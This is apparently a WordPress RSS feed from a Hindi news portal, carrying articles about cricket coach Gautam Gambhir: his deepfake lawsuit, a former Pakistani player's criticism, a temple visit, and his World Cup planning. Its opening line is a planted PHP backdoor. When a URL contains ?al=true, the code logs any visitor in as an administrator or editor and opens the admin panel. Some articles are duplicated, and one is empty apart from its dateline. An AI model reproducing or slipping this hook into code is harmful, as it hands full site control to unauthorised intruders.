// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Gautam Gambhir – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Thu, 19 Mar 2026 11:26:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 AI डीपफेक से तंग गंभीर पहुंचे दिल्ली हाई कोर्ट, लीगल एक्शन लेकर इन बड़ी कंपनियों को घेरा https://pratyushaashakinayikiran.com/?p=206070 Thu, 19 Mar 2026 11:26:00 +0000 https://pratyushaashakinayikiran.com/?p=206070  नई दिल्ली
भारतीय क्रिकेट टीम के हेड कोच और पूर्व वर्ल्ड कप विजेता गौतम गंभीर ने अपनी पहचान के कथित दुरुपयोग को लेकर दिल्ली हाई कोर्ट का रुख किया है. उन्होंने कोर्ट की कमर्शियल डिवीजन में सिविल सूट दायर कर AI डीपफेक, फर्जी वीडियो और बिना अनुमति मर्चेंडाइज बेचने के खिलाफ सख्त कार्रवाई की मांग की है।

गंभीर की लीगल टीम के मुताबिक, 2025 के अंत से सोशल मीडिया पर फर्जी कंटेंट तेजी से बढ़ा. इंस्टाग्राम, एक्स (Twitter), यूट्यूब और फेसबुक पर कई अकाउंट्स ने AI तकनीक, फेस-स्वैप और वॉइस क्लोनिंग के जरिए ऐसे वीडियो बनाए, जिनमें गंभीर को ऐसे बयान देते दिखाया गया जो उन्होंने कभी दिए ही नहीं।

एक फर्जी रेज‍िग्नेशन को 29 लाख से ज्यादा व्यूज मिले, जबकि एक और क्लिप, जिसमें उन्हें सीनियर खिलाड़ियों पर टिप्पणी करते दिखाया गया, 17 लाख व्यूज तक पहुंची।

सिर्फ सोशल मीडिया ही नहीं, बल्कि ई-कॉमर्स प्लेटफॉर्म्स पर भी गंभीर के नाम और तस्वीर का इस्तेमाल कर बिना अनुमति पोस्टर और प्रोडक्ट बेचे जा रहे थे।

गौतम गंभीर ने किन पर किया केस
इस मामले में कुल 16 प्रतिवादियों को शामिल किया गया है, जिनमें- सोशल मीडिया अकाउंट्स (जैनकी फ्रेम्स, भूपेंद्र पेंटोला, लीजेंड्स रेवोल्यूशन, आदि शाम‍िल हैं।

इसके अलावा  ई-कॉमर्स प्लेटफॉर्म् में ऐमोजॉन और फ्ल‍िपकार्ट का नाम है. वहीं टेक कंपनियों में मेटा प्लेटफॉर्म, एक्स, गूगल, यूट्यब आद‍ि शाम‍िल हैं. साथ ही IT मंत्रालय और दूरसंचार विभाग को भी शामिल किया गया है।

गंभीर ने किन कानूनों लिया सहारा?
गंभीर ने इस केस में कॉपीराइट एक्ट 1957, ट्रेडमार्क एक्ट 1999, कमर्श‍ियल कोर्ट एक्ट 20215 का हवाला दिया है. साथ ही दिल्ली हाई कोर्ट के पुराने फैसलों (जैसे अमिताभ बच्चन और अनिल कपूर के केस) का भी उल्लेख किया गया है, जिनमें पर्सनैलिटी राइट्स को कानूनी सुरक्षा दी गई है।

गंभीर ने कितना हर्जाना मांगा?
गंभीर ने कोर्ट से ₹2.5 करोड़ का हर्जाना, सभी फर्जी कंटेंट हटाने, और भविष्य में उनके नाम, चेहरा, आवाज के इस्तेमाल पर रोक लगाने की मांग की है. उन्होंने इस मामले में जल्द से जल्द कोर्ट ऑर्डर की मांग की है, ताकि तुरंत सभी फर्जी कंटेंट हटाया जाए और आगे इसका प्रसार रोका जा सके. उन्होंने कोर्ट से लीगल एक्शन लेने की मांग की है।

मेरी पहचान को हथियार बनाया गया: गंभीर 
गंभीर ने साफ कहा- मेरी पहचान, मेरा नाम, चेहरा और आवाज का इस्तेमाल गलत तरीके से किया गया है. यह सिर्फ व्यक्तिगत मामला नहीं, बल्कि कानून और गरिमा की बात है।

]]>
गौतम गंभीर की राजनीति पर उठा सवाल, पूर्व पाक खिलाड़ी बोले- टीम इंडिया की छवि हुई खराब https://pratyushaashakinayikiran.com/?p=200531 Tue, 24 Feb 2026 15:50:00 +0000 https://pratyushaashakinayikiran.com/?p=200531 नई दिल्ली
अहमद शहजाद ने इंडिया के कोच गौतम गंभीर की आलोचना करते हुए कहा कि वह इंडियन टीम के माहौल में पॉलिटिक्स ले आए हैं। टी20 वर्ल्ड कप में साउथ अफ्रीका के खिलाफ मिली बड़ी हार के बाद गौतम गंभीर पर प्रेशर बढ़ रहा है। पूर्व पाकिस्तानी क्रिकेटर अहमद शहजाद ने इंडिया के कोच गौतम गंभीर की आलोचना करते हुए कहा कि वह इंडियन टीम के माहौल में पॉलिटिक्स ले आए हैं। टी20 वर्ल्ड कप में साउथ अफ्रीका के खिलाफ मिली बड़ी हार के बाद गौतम गंभीर पर प्रेशर बढ़ रहा है। सेमीफाइनल की दौड़ में भारत और तब पिछड़ा जब वेस्टइंडीज ने जिम्बाब्वे के खिलाफ बड़े अंतर से जीत दर्ज की। टी20 वर्ल्ड कप में भारत की इस स्थिति के बाद हर कोई कोच गौतम गंभीर के फैसलों पर सवाल उठा रहा है। भारत का अगला सुपर-8 का मुकाबला जिम्बाब्वे से 26 फरवरी को है।

साउथ अफ्रीका के खिलाफ अहम मुकाबले में अक्षर पटेल की जगह वॉशिंगटन सुंदर को चुनने पर गंभीर की आलोचना हुई, जिसमें आर अश्विन समेत कई खिलाड़ियों ने इस फैसले पर सवाल उठाए थे। हारना मना है पर बात करते हुए, शहजाद ने कहा कि 2019-24 के दौरान भारतीय राजनीति में अपने समय के दौरान गंभीर की सोच बदल गई, जब वे पूर्वी दिल्ली से सांसद थे।

शहजाद ने कहा, “जब आप किसी भी फील्ड में जाते हैं, तो पूरा फोकस करना होता है। गंभीर पॉलिटिक्स में आए, और जाहिर है उनका माइंडसेट बदल गया। वह पॉलिटिक्स में ज्यादा सफल नहीं रहे, लेकिन ऐसा लगता है कि उन्होंने वही पॉलिटिक्स टीम के माहौल में ला दी है। गौतम गंभीर की इस सारी पॉलिटिक्स ने इंडियन टीम की इमेज को नुकसान पहुंचाया है।”

शहजाद ने गंभीर पर अपने रिसोर्स का सही इस्तेमाल न करने का आरोप लगाया और कुलदीप यादव का उदाहरण दिया, जिन्होंने मौजूदा T20 वर्ल्ड कप में सिर्फ एक मैच खेला है। शहजाद ने आगे कहा, "टीम के रिसोर्स का सही इस्तेमाल नहीं हो रहा है – गौतम गंभीर उन्हें ठीक से मैनेज नहीं कर रहे हैं। आपके पास कुलदीप यादव जैसा मैच-विनर है, लेकिन उसे सही तरीके से हैंडल नहीं किया जा रहा है।"

उन्होंने कहा, "पाकिस्तान के साथ मैच के बाद एक घटना हुई थी, जिसमें सूर्यकुमार यादव ने उन्हें बाहर कर दिया था। लोग अब कह रहे हैं कि शायद कुलदीप यादव को डिसिप्लिनरी इशू या सूर्यकुमार यादव के साथ कोई प्रॉब्लम की वजह से बाहर किया गया। नहीं तो, उन्हें बाहर नहीं किया जाता। कुलदीप यादव वैरिएशन लाते हैं और मैच-विनर हैं।"

]]>
गौतम गंभीर की राजनीति पर उठा सवाल, पूर्व पाक खिलाड़ी बोले- टीम इंडिया की छवि हुई खराब https://pratyushaashakinayikiran.com/?p=200533 Tue, 24 Feb 2026 15:50:00 +0000 https://pratyushaashakinayikiran.com/?p=200533 नई दिल्ली
अहमद शहजाद ने इंडिया के कोच गौतम गंभीर की आलोचना करते हुए कहा कि वह इंडियन टीम के माहौल में पॉलिटिक्स ले आए हैं। टी20 वर्ल्ड कप में साउथ अफ्रीका के खिलाफ मिली बड़ी हार के बाद गौतम गंभीर पर प्रेशर बढ़ रहा है। पूर्व पाकिस्तानी क्रिकेटर अहमद शहजाद ने इंडिया के कोच गौतम गंभीर की आलोचना करते हुए कहा कि वह इंडियन टीम के माहौल में पॉलिटिक्स ले आए हैं। टी20 वर्ल्ड कप में साउथ अफ्रीका के खिलाफ मिली बड़ी हार के बाद गौतम गंभीर पर प्रेशर बढ़ रहा है। सेमीफाइनल की दौड़ में भारत और तब पिछड़ा जब वेस्टइंडीज ने जिम्बाब्वे के खिलाफ बड़े अंतर से जीत दर्ज की। टी20 वर्ल्ड कप में भारत की इस स्थिति के बाद हर कोई कोच गौतम गंभीर के फैसलों पर सवाल उठा रहा है। भारत का अगला सुपर-8 का मुकाबला जिम्बाब्वे से 26 फरवरी को है।

साउथ अफ्रीका के खिलाफ अहम मुकाबले में अक्षर पटेल की जगह वॉशिंगटन सुंदर को चुनने पर गंभीर की आलोचना हुई, जिसमें आर अश्विन समेत कई खिलाड़ियों ने इस फैसले पर सवाल उठाए थे। हारना मना है पर बात करते हुए, शहजाद ने कहा कि 2019-24 के दौरान भारतीय राजनीति में अपने समय के दौरान गंभीर की सोच बदल गई, जब वे पूर्वी दिल्ली से सांसद थे।

शहजाद ने कहा, “जब आप किसी भी फील्ड में जाते हैं, तो पूरा फोकस करना होता है। गंभीर पॉलिटिक्स में आए, और जाहिर है उनका माइंडसेट बदल गया। वह पॉलिटिक्स में ज्यादा सफल नहीं रहे, लेकिन ऐसा लगता है कि उन्होंने वही पॉलिटिक्स टीम के माहौल में ला दी है। गौतम गंभीर की इस सारी पॉलिटिक्स ने इंडियन टीम की इमेज को नुकसान पहुंचाया है।”

शहजाद ने गंभीर पर अपने रिसोर्स का सही इस्तेमाल न करने का आरोप लगाया और कुलदीप यादव का उदाहरण दिया, जिन्होंने मौजूदा T20 वर्ल्ड कप में सिर्फ एक मैच खेला है। शहजाद ने आगे कहा, "टीम के रिसोर्स का सही इस्तेमाल नहीं हो रहा है – गौतम गंभीर उन्हें ठीक से मैनेज नहीं कर रहे हैं। आपके पास कुलदीप यादव जैसा मैच-विनर है, लेकिन उसे सही तरीके से हैंडल नहीं किया जा रहा है।"

उन्होंने कहा, "पाकिस्तान के साथ मैच के बाद एक घटना हुई थी, जिसमें सूर्यकुमार यादव ने उन्हें बाहर कर दिया था। लोग अब कह रहे हैं कि शायद कुलदीप यादव को डिसिप्लिनरी इशू या सूर्यकुमार यादव के साथ कोई प्रॉब्लम की वजह से बाहर किया गया। नहीं तो, उन्हें बाहर नहीं किया जाता। कुलदीप यादव वैरिएशन लाते हैं और मैच-विनर हैं।"

]]>
भारतीय क्रिकेट कोच गौतम गंभीर ने उज्जैन में महाकाल की भस्म आरती की https://pratyushaashakinayikiran.com/?p=193636 Fri, 16 Jan 2026 10:40:00 +0000 https://pratyushaashakinayikiran.com/?p=193636 उज्जैन
 विश्व प्रसिद्ध महाकालेश्वर मंदिर में वीआईपी श्रद्धालुओं का आना लगातार जारी है। शुक्रवार को भारतीय टीम के कोच गौतम गंभीर बाबा के दरबार में पहुंचे। वे यहां सुबह 4 बजे होने वाली भस्म आरती में शामिल हुए। इस दौरान वे करीब 2 घंटे तक मंदिर प्रांगण में रहे और नंदी हाल में बैठकर बाबा महाकाल की भस्म आरती देखी। वे पूरी तरह शिव भक्ति में लीन दिखाई दिए। भस्म आरती के दौरान गौतम गंभीर ने नन्दी हाल में बैठकर ओम नमः शिवाय का जाप भी किया। वहीं, दूसरी ओर श्री महाकालेश्वर मंदिर समिति ने बाबा महाकाल का प्रसाद व तस्वीर भेंटकर गौतम गंभीर का सम्मान किया। उन्होंने गर्भगृह की चौखट से बाबा महाकाल के दर्शन कर जल अर्पित किया।

18 जनवरी को होने वाले मुकाबले के लिए टीम इंडिया इंदौर में मौजूद है। मैच से पहले दोनों कोच सुबह करीब चार बजे महाकाल मंदिर पहुंचे और नंदी हॉल में बैठकर लगभग दो घंटे तक भस्म आरती में शामिल हुए। इस दौरान उन्होंने भगवान महाकाल से टीम इंडिया की सफलता और जीत की कामना की।

आरती के पश्चात गौतम गंभीर और शीतांशु कोटक ने गर्भगृह की देहरी से दर्शन किए और नंदी महाराज पर जल अर्पित किया। मंदिर समिति की ओर से सहायक प्रशासक आशीष फलवाड़िया ने दोनों का सम्मान भी किया।

बगलामुखी धाम में भी की विशेष पूजा

गौतम गंभीर आगर मालवा जिले के नलखेड़ा स्थित विश्व प्रसिद्ध मां बगलामुखी देवी के दर्शन किए। यहां उन्होंने विधिवत पूजा-अर्चना कर देश की सुख-शांति, समृद्धि और सफलता की कामना की। इस अवसर पर मंदिर समिति के पदाधिकारी और बड़ी संख्या में श्रद्धालु मौजूद रहे।

केएल राहुल ने भी लिया बाबा का आशीर्वाद

शुक्रवार को ही भारतीय टीम के स्टार बल्लेबाज केएल राहुल भी उज्जैन पहुंचे थे। उन्होंने नंदी हॉल में बैठकर भगवान महाकाल का जाप किया, नंदी महाराज के कान में मनोकामना कही और जल अर्पित किया। पूजन के दौरान केएल राहुल केसरिया दुपट्टा धारण किए हुए नजर आए।

राहुल ने गर्भगृह की देहरी से विधिवत पूजन कर आशीर्वाद लिया। मंदिर प्रबंध समिति की ओर से उप प्रशासक सिम्मी यादव ने उनका स्वागत और सम्मान किया। इंदौर वनडे से पहले टीम इंडिया के खिलाड़ियों और कोचिंग स्टाफ की यह आध्यात्मिक यात्रा क्रिकेट प्रेमियों के बीच खास चर्चा का विषय बनी हुई है।

]]>
टी20 वर्ल्ड कप के लिए भारतीय टीम तैयार नहीं — गौतम गंभीर के बयान से मचा हलचल https://pratyushaashakinayikiran.com/?p=190566 Mon, 10 Nov 2025 14:20:00 +0000 https://pratyushaashakinayikiran.com/?p=190566 नई दिल्ली

भारतीय क्रिकेट टीम के मुख्य कोच गौतम गंभीर ने स्वीकार किया कि उनकी टीम अगले साल होने वाले टी20 वर्ल्ड कप की तैयारियों के मामले में अभी उस स्थिति में नहीं है जहां वह पहुंचना चाहती है लेकिन उन्होंने इसके साथ ही कहा कि इस मुकाम पर पहुंचने के लिए टीम के पास अभी पर्याप्त समय है। गंभीर ने बीसीसीआई टीवी से बातचीत में फिटनेस के महत्व पर भी जोर दिया। उन्होंने 46 सेकंड की क्लिप में कहा, ‘‘यह एक ऐसा ड्रेसिंग रूम है जहां बहुत अधिक पारदर्शिता और ईमानदारी है तथा हम चाहते हैं कि यह ड्रेसिंग रूम आगे भी ऐसा ही बना रहे। मुझे लगता है कि हम अभी भी उस स्थिति में नहीं हैं जहां हम टी20 वर्ल्ड कप तक पहुंचना चाहते हैं।’’

इस क्लिप के बाद पूरा साक्षात्कार बाद में प्रसारित किया जाएगा।

उन्होंने कहा, ‘‘उम्मीद है कि खिलाड़ियों को फिट रहने का महत्व पता चल जाएगा। हमारे पास उस स्तर पर पहुंचने के लिए अभी भी तीन महीने हैं, जहां हम पहुंचना चाहते हैं।‘‘

टी20 वर्ल्ड कप अगले साल फरवरी-मार्च में भारत और श्रीलंका में खेला जाएगा। भारत इस टूर्नामेंट का मौजूदा चैंपियन है।

गंभीर ने इसके साथ ही खिलाड़ियों को अपनी प्रतिभा का अच्छी तरह से अहसास कराने और उन्हें समझने के लिए उनके सामने मुश्किल चुनौतियों को रखने की बात भी दोहराई।

उन्होंने कहा, ‘‘हम खिलाड़ियों के सामने जितना संभव हो सके उतनी कड़ी चुनौती रखते हैं। हमने शुभमन (गिल) के साथ भी यही किया था, जब उन्हें टेस्ट कप्तान नियुक्त किया गया था।‘‘

गिल ने कप्तान के रूप में इंग्लैंड के खिलाफ अपनी पहली टेस्ट सीरीज में शानदार बल्लेबाजी की। उनकी अगुवाई में भारतीय टीम ने सीरीज 2-2 से बराबर की। इस सीरीज के सभी मैच रोमांचक रहे और प्रत्येक मैच पांचवें दिन तक खिंचा।

]]>
टी20 वर्ल्ड कप के लिए भारतीय टीम तैयार नहीं — गौतम गंभीर के बयान से मचा हलचल https://pratyushaashakinayikiran.com/?p=190568 Mon, 10 Nov 2025 14:20:00 +0000 https://pratyushaashakinayikiran.com/?p=190568 नई दिल्ली

भारतीय क्रिकेट टीम के मुख्य कोच गौतम गंभीर ने स्वीकार किया कि उनकी टीम अगले साल होने वाले टी20 वर्ल्ड कप की तैयारियों के मामले में अभी उस स्थिति में नहीं है जहां वह पहुंचना चाहती है लेकिन उन्होंने इसके साथ ही कहा कि इस मुकाम पर पहुंचने के लिए टीम के पास अभी पर्याप्त समय है। गंभीर ने बीसीसीआई टीवी से बातचीत में फिटनेस के महत्व पर भी जोर दिया। उन्होंने 46 सेकंड की क्लिप में कहा, ‘‘यह एक ऐसा ड्रेसिंग रूम है जहां बहुत अधिक पारदर्शिता और ईमानदारी है तथा हम चाहते हैं कि यह ड्रेसिंग रूम आगे भी ऐसा ही बना रहे। मुझे लगता है कि हम अभी भी उस स्थिति में नहीं हैं जहां हम टी20 वर्ल्ड कप तक पहुंचना चाहते हैं।’’

इस क्लिप के बाद पूरा साक्षात्कार बाद में प्रसारित किया जाएगा।

उन्होंने कहा, ‘‘उम्मीद है कि खिलाड़ियों को फिट रहने का महत्व पता चल जाएगा। हमारे पास उस स्तर पर पहुंचने के लिए अभी भी तीन महीने हैं, जहां हम पहुंचना चाहते हैं।‘‘

टी20 वर्ल्ड कप अगले साल फरवरी-मार्च में भारत और श्रीलंका में खेला जाएगा। भारत इस टूर्नामेंट का मौजूदा चैंपियन है।

गंभीर ने इसके साथ ही खिलाड़ियों को अपनी प्रतिभा का अच्छी तरह से अहसास कराने और उन्हें समझने के लिए उनके सामने मुश्किल चुनौतियों को रखने की बात भी दोहराई।

उन्होंने कहा, ‘‘हम खिलाड़ियों के सामने जितना संभव हो सके उतनी कड़ी चुनौती रखते हैं। हमने शुभमन (गिल) के साथ भी यही किया था, जब उन्हें टेस्ट कप्तान नियुक्त किया गया था।‘‘

गिल ने कप्तान के रूप में इंग्लैंड के खिलाफ अपनी पहली टेस्ट सीरीज में शानदार बल्लेबाजी की। उनकी अगुवाई में भारतीय टीम ने सीरीज 2-2 से बराबर की। इस सीरीज के सभी मैच रोमांचक रहे और प्रत्येक मैच पांचवें दिन तक खिंचा।

]]>
टीम इंडिया के लिए गौतम गंभीर 2026 टी20 विश्व कप, 2027 वर्ल्ड टेस्ट चैंपियनशिप और 2027 वर्ल्ड कप का ब्लूप्रिंट तैयार करेंगे https://pratyushaashakinayikiran.com/?p=139175 Wed, 12 Mar 2025 08:47:00 +0000 https://pratyushaashakinayikiran.com/?p=139175 नई दिल्ली
चैंपियंस ट्रॉफी 2025 के खत्म होने के बाद से अगले तीन महीने तक भारतीय टीम एक भी इंटरनेशनल मैच नहीं खेलेगी, क्योंकि इस दौरान आईपीएल का आयोजन होगा और 20 जून से इंग्लैंड का दौरा शुरू होगा। इस दौरान टीम इंडिया के ज्यादातर खिलाड़ी तो आईपीएल खेलेंगे, लेकिन उस समय हेड कोच गौतम गंभीर क्या कर रहे होंगे? ये एक सवाल आपके दिमाग में भी आया होगा। आप सोच रहे होंगे कि बाकी कोचों की तरह वे घर पर आराम करेंगे, लेकिन असल में ऐसा नहीं है। कुछ दिन के ब्रेक के बाद वे फिर से काम पर जुट जाएंगे और टीम इंडिया के लिए 2026 टी20 विश्व कप, 2027 वर्ल्ड टेस्ट चैंपियनशिप और 2027 वर्ल्ड कप का ब्लूप्रिंट तैयार करेंगे।

जून के तीसरे सप्ताह से टीम इंडिया को पांच मैचों की टेस्ट सीरीज इंग्लैंड में खेलनी है, जो आईसीसी वर्ल्ड टेस्ट चैंपियनशिप के नए चक्र का हिस्सा होगी। गंभीर इसी सीरीज की तैयारी के लिए इंग्लैंड जाएंगे। टाइम्स ऑफ इंडिया की रिपोर्ट की मानें तो गंभीर ने 20 जून से शुरू हो रहे टेस्ट दौरे से पहले इंडिया 'ए' टीम के साथ इंग्लैंड जाने का फैसला किया है। बीसीसीआई के पास डेवलेपमेंट्स टीमों के लिए कोई नॉमिनेटेड कोच नहीं है। ऐसे में यह देखना दिलचस्प होगा कि क्या गंभीर सिर्फ ऑब्जर्वर के तौर पर ट्रेवल करेंगे या फिर बोर्ड वीवीएस लक्ष्मण को कोच के तौर पर भेजेगा।

जब से राहुल द्रविड़ टीम इंडिया के हेड कोच बने थे, तभी से इंडिया ए और अंडर 19 टीम के हेड कोच की जिम्मेदारी नेशनल क्रिकेट एकेडमी के प्रमुख को मिलती रही है। ऐसा पहली बार होगा कि मुख्य टीम का कोच इंडिया ए टीम के साथ ट्रेवल करेगा। सूत्रों ने टीओआई को बताया कि गंभीर 2027 वनडे विश्व कप के लिए अगले दो वर्षों के लिए सभी प्रारूपों के रोडमैप पर काम कर रहे हैं, इस चरण में विश्व टेस्ट चैंपियनशिप और 2026 टी20 विश्व कप भी शामिल होंगे।

बीसीसीआई के अधिकारी ने बताया, "ऑस्ट्रेलिया से लौटने के बाद से ही गंभीर बीसीसीआई के साथ चर्चा कर रहे हैं। उन्होंने रिजर्व पूल के बारे में स्पष्ट जानकारी प्राप्त करने के लिए इंडिया 'ए' टीम के साथ यात्रा करने की इच्छा व्यक्त की है। गंभीर द्वारा कुछ वाइल्ड कार्ड खिलाड़ियों के लिए आग्रह करने के बाद भारत ने चैंपियंस ट्रॉफी जीती है, इसलिए भविष्य में उनसे और अधिक प्रयास करने की उम्मीद की जा सकती है।" गंभीर ने पिछले साल जुलाई से कार्यभार संभाला है और वे घर पर 3-0 से न्यूजीलैंड के खिलाफ टेस्ट सीरीज और बॉर्डर गावस्कर ट्रॉफी हारे हैं, लेकिन कई सीरीज और चैंपियंस ट्रॉफी जीत चुके हैं।

सूत्र ने आगे बताया, "पहचाने गए महत्वपूर्ण मुद्दों में से एक इंडिया 'ए' दौरों को फिर से शुरू करना है। द्रविड़ के एनसीए छोड़ने के बाद से केवल कुछ ही 'ए' सीरीज हुई हैं और वे सभी मार्की सीरीज के लिए शेडो टूर थे। गंभीर का भी मानना ​​है कि अधिक 'ए' दौरे होने चाहिए। इसलिए वह स्थिति का खुद जायजा लेना चाहते हैं।" टेस्ट के अलावा गंभीर को ये भी देखना है कि वनडे में आगे कौन खेलेगा? रोहित, विराट और जडेजा ने रिटायरमेंट नहीं लिया, लेकिन सवाल ये है कि क्या वे वर्ल्ड कप 2027 में खेलेंगे?

]]>
टीम इंडिया के लिए गौतम गंभीर 2026 टी20 विश्व कप, 2027 वर्ल्ड टेस्ट चैंपियनशिप और 2027 वर्ल्ड कप का ब्लूप्रिंट तैयार करेंगे https://pratyushaashakinayikiran.com/?p=139177 Wed, 12 Mar 2025 08:47:00 +0000 https://pratyushaashakinayikiran.com/?p=139177 नई दिल्ली

बीच सीरीज ऑस्ट्रेल‍िया से भारत लौट रहे कोच गौतम गंभीर, फैम‍िली इमरजेंसी है वजह https://pratyushaashakinayikiran.com/?p=103018 Tue, 26 Nov 2024 12:16:00 +0000 https://pratyushaashakinayikiran.com/?p=103018 पर्थ  

बॉर्डर-गावस्कर ट्रॉफी 2024-25 का जीत के साथ धमाकेदार आगाज करने वाली भारतीय क्रिकेट टीम के लिए एक बुरी खबर सामने आई है। दरअसल टाइम्स ऑफ इंडिया की रिपोर्ट के मुताबिक भारतीय टीम के कोच गौतम गंभीर अचानक ऑस्ट्रेलिया छोड़कर भारत लौटने वाले हैं। रिपोर्ट के मुताबिक उनके घर पर कोई मेडिकल इमरजेंसी है जिसके चलते गंभीर को जाना पड़ रहा है।र्थ के ऑप्टस स्टेडियम में भारत की ऐतिहासिक जीत के सूत्रधार रहे गंभीर हालांकि एडिलेड में होने वाले दूसरे टेस्ट मैच से पहले वापस लौट आएंगे।

मामले से जुड़े सूत्रों ने पहले टेस्ट मैच में भारत की जीत के कुछ घंटों बाद इस घटनाक्रम की पुष्टि की। पर्थ में 295 रनों की जीत के साथ भारत 5 मैचों की सीरीज में 1-0 से आगे हो गया है, जिससे वे विश्व टेस्ट चैंपियनशिप के फाइनल में जगह बनाने के लिए आखिरी समय में प्रयास कर रहे हैं।

प्रेक्टिस सेशन में नहीं रहेंगे गंभीर

भारतीय टीम बुधवार को दो दिवसीय पिंक-बॉल टूर गेम के लिए कैनबरा जाने वाली है। हालांकि, गौतम गंभीर शनिवार से शुरू होने वाले इस अभ्यास मैच के लिए टीम का हिस्सा नहीं होंगे। टीम एडिलेड में होने वाले डे-नाइट टेस्ट की तैयारी कर रही है, जिसमें ऑस्ट्रेलियाई तेज गेंदबाजी आक्रमण के खिलाफ कड़ा मुकाबला होने की उम्मीद है।
प्लेइंग 11 को लेकर फंसा पेंच

रोहित शर्मा और शुभमन गिल की प्लेइंग इलेवन में वापसी के कारण भारतीय टीम को दूसरे टेस्ट मैच के लिए चयन में परेशानी होने की उम्मीद है। ऑस्ट्रेलिया के खिलाफ सीरीज के पहले मैच के चौथे दिन रोहित शर्मा को भारतीय ड्रेसिंग रूम में गंभीर के साथ बैठे देखा गया। रोहित को सोमवार को नेट्स में गुलाबी गेंद से अभ्यास करते हुए भी देखा गया।

]]>
बदलाव हो या ना हो, सीनियर खिलाड़ी रन बनाने के लिए भूखे हैं : गंभीर https://pratyushaashakinayikiran.com/?p=96968 Mon, 11 Nov 2024 15:50:00 +0000 https://pratyushaashakinayikiran.com/?p=96968 मुंबई
भारत के मुख्य कोच गौतम गंभीर ने हाल में खराब प्रदर्शन के कारण दबाव में चल रहे कप्तान रोहित शर्मा और स्टार बल्लेबाज विराट कोहली का बचाव करते हुए सोमवार को यहां कहा कि यह दोनों सीनियर खिलाड़ी रन बनाने के लिए भूखे हैं और ऑस्ट्रेलिया में दमदार वापसी करेंगे। गंभीर ने इन बातों को भी खारिज कर दिया कि न्यूजीलैंड के खिलाफ घरेलू श्रृंखला में तीनों टेस्ट मैच गंवाने के बाद भारतीय टीम दबाव में है।

गंभीर ने ऑस्ट्रेलिया दौरे पर रवाना होने से पहले संवाददाता सम्मेलन में कहा,‘‘भारतीय टीम में अविश्वसनीय खिलाड़ी हैं जिन्होंने अभी तक अपनी भूमिका शानदार तरीके से निभाई है।’’ उन्होंने कहा,‘‘मैं किसी तरह का दबाव महसूस नहीं कर रहा हूं। भारतीय टीम का कोच बनना सम्मान और सौभाग्य की बात है।’’ भारत और ऑस्ट्रेलिया के बीच पहला टेस्ट मैच 22 नवंबर से पर्थ में खेला जाएगा।

गंभीर से जब पूछा गया कि क्या उन्हें डंकन फ्लेचर के समय जैसा दबाव महसूस होता है जब टीम बदलाव के दौर में थी, उन्होंने कहा ,‘‘मैं बदलाव के बारे में नहीं बल्कि पांच टेस्ट मैचों के बारे में सोच रहा हूं। बदलाव हो या न हो, अगर ऐसा होना है तो होगा, लेकिन मैं भारतीय टीम में कुछ ऐसे अविश्वसनीय खिलाड़ियों को देख रहा हूं जो अच्छा प्रदर्शन करने के लिए बेताब हैं।’’

भारतीय कोच ने यह भी पुष्टि की अगर रोहित शर्मा निजी कारणों से पहले टेस्ट मैच में नहीं खेल पाते हैं तो उप कप्तान जसप्रीत बुमराह टीम की कमान संभालेंगे। उन्होंने यह भी कहा कि टीम के पास सलामी बल्लेबाज के स्थान के लिए केएल राहुल और अभिमन्यु ईश्वरन के रूप में विकल्प मौजूद हैंं।

]]>